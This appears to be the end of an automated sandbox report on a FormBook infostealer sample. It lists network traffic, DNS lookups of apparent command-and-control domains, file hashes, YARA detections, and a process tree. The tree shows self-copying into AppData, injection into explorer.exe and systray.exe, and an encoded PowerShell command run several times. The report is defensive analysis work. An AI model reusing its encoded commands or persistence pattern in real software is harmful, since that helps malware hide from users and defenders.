                                                                            Mar 21, 2023 09:10:10.695442915 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.695466995 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.695493937 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.695514917 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.695888042 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.695940971 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.695972919 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.695986032 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.696022987 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.696048975 CET49698443192.168.2.5188.40.83.211

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 21, 2023 09:10:10.167546034 CET5029553192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:10:10.190110922 CET53502958.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:06.057960033 CET6189353192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:06.080689907 CET53618938.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:12.532519102 CET6064953192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:12.570863962 CET53606498.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:27.414058924 CET5144153192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:27.439889908 CET53514418.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:32.721693039 CET4917753192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:32.756217957 CET53491778.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:33.768779039 CET4972453192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:33.796116114 CET53497248.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:38.816267967 CET6145253192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:38.865930080 CET53614528.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:52.604053974 CET6532353192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:52.655042887 CET53653238.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:12:02.826678038 CET5148453192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:12:02.859888077 CET53514848.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:12:10.767373085 CET6344653192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:12:10.800434113 CET53634468.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:12:30.799199104 CET5675153192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:12:30.833955050 CET53567518.8.8.8192.168.2.5

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Mar 21, 2023 09:10:10.167546034 CET192.168.2.58.8.8.80x51aeStandard query (0)a.uguu.seA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:06.057960033 CET192.168.2.58.8.8.80x4cc7Standard query (0)a.uguu.seA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:12.532519102 CET192.168.2.58.8.8.80x4c7cStandard query (0)a.uguu.seA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:27.414058924 CET192.168.2.58.8.8.80x796eStandard query (0)www.findmyoriginstory.comA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:32.721693039 CET192.168.2.58.8.8.80xd6deStandard query (0)www.myprojoints.comA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:33.768779039 CET192.168.2.58.8.8.80x8005Standard query (0)www.myprojoints.comA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:38.816267967 CET192.168.2.58.8.8.80x9a6fStandard query (0)www.emprendizajesocial.comA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:52.604053974 CET192.168.2.58.8.8.80xae8bStandard query (0)www.brunaeleandro.comA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:02.826678038 CET192.168.2.58.8.8.80x2e15Standard query (0)www.madisoncountylincoln.comA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:10.767373085 CET192.168.2.58.8.8.80xf69Standard query (0)www.metatv.appA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:30.799199104 CET192.168.2.58.8.8.80x55cStandard query (0)www.funhood.lifeA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Mar 21, 2023 09:10:10.190110922 CET8.8.8.8192.168.2.50x51aeNo error (0)a.uguu.se188.40.83.211A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:06.080689907 CET8.8.8.8192.168.2.50x4cc7No error (0)a.uguu.se188.40.83.211A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:12.570863962 CET8.8.8.8192.168.2.50x4c7cNo error (0)a.uguu.se188.40.83.211A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:27.439889908 CET8.8.8.8192.168.2.50x796eNo error (0)www.findmyoriginstory.com74.208.236.131A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:32.756217957 CET8.8.8.8192.168.2.50xd6deName error (3)www.myprojoints.comnonenoneA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:33.796116114 CET8.8.8.8192.168.2.50x8005Name error (3)www.myprojoints.comnonenoneA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:38.865930080 CET8.8.8.8192.168.2.50x9a6fNo error (0)www.emprendizajesocial.com217.160.0.229A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:52.655042887 CET8.8.8.8192.168.2.50xae8bNo error (0)www.brunaeleandro.combrunaeleandro.comCNAME (Canonical name)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:52.655042887 CET8.8.8.8192.168.2.50xae8bNo error (0)brunaeleandro.com54.85.86.211A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:02.859888077 CET8.8.8.8192.168.2.50x2e15No error (0)www.madisoncountylincoln.com172.67.152.24A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:02.859888077 CET8.8.8.8192.168.2.50x2e15No error (0)www.madisoncountylincoln.com104.21.65.231A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:10.800434113 CET8.8.8.8192.168.2.50xf69No error (0)www.metatv.app172.67.194.225A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:10.800434113 CET8.8.8.8192.168.2.50xf69No error (0)www.metatv.app104.21.20.242A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:30.833955050 CET8.8.8.8192.168.2.50x55cNo error (0)www.funhood.life162.213.249.254A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • a.uguu.se
                                                                            • www.findmyoriginstory.com
                                                                            • www.emprendizajesocial.com
                                                                            • www.brunaeleandro.com
                                                                            • www.madisoncountylincoln.com
                                                                            • www.metatv.app

                                                                            Statistics

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:09:10:07
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\Desktop\SC_0017384.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\SC_0017384.exe
                                                                            Imagebase:0xcf0000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            General

                                                                            Target ID:1
                                                                            Start time:09:10:18
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                            Imagebase:0xdd0000
                                                                            File size:430592 bytes
                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:2
                                                                            Start time:09:10:18
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7fcd70000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:3
                                                                            Start time:09:10:45
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\Desktop\SC_0017384.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\SC_0017384.exe
                                                                            Imagebase:0xc20000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            Reputation:low

                                                                            General

                                                                            Target ID:4
                                                                            Start time:09:10:48
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                            Imagebase:0x7ff69bc80000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:5
                                                                            Start time:09:10:57
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
                                                                            Imagebase:0x250000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 13%, ReversingLabs
                                                                            Reputation:low

                                                                            General

                                                                            Target ID:8
                                                                            Start time:09:11:05
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\SysWOW64\systray.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\systray.exe
                                                                            Imagebase:0xea0000
                                                                            File size:9728 bytes
                                                                            MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            Reputation:moderate

                                                                            General

                                                                            Target ID:9
                                                                            Start time:09:11:07
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
                                                                            Imagebase:0x160000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Reputation:low

                                                                            General

                                                                            Target ID:10
                                                                            Start time:09:11:33
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                            Imagebase:0xdd0000
                                                                            File size:430592 bytes
                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:11
                                                                            Start time:09:11:33
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7fcd70000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language

                                                                            General

                                                                            Target ID:12
                                                                            Start time:09:11:43
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                            Imagebase:0xdd0000
                                                                            File size:430592 bytes
                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET

                                                                            General

                                                                            Target ID:13
                                                                            Start time:09:11:44
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7fcd70000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language

                                                                            General

                                                                            Target ID:14
                                                                            Start time:09:11:58
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Imagebase:0xa30000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language

                                                                            General

                                                                            Target ID:16
                                                                            Start time:09:12:09
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Imagebase:0x950000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language

                                                                            Disassembly

                                                                            No disassembly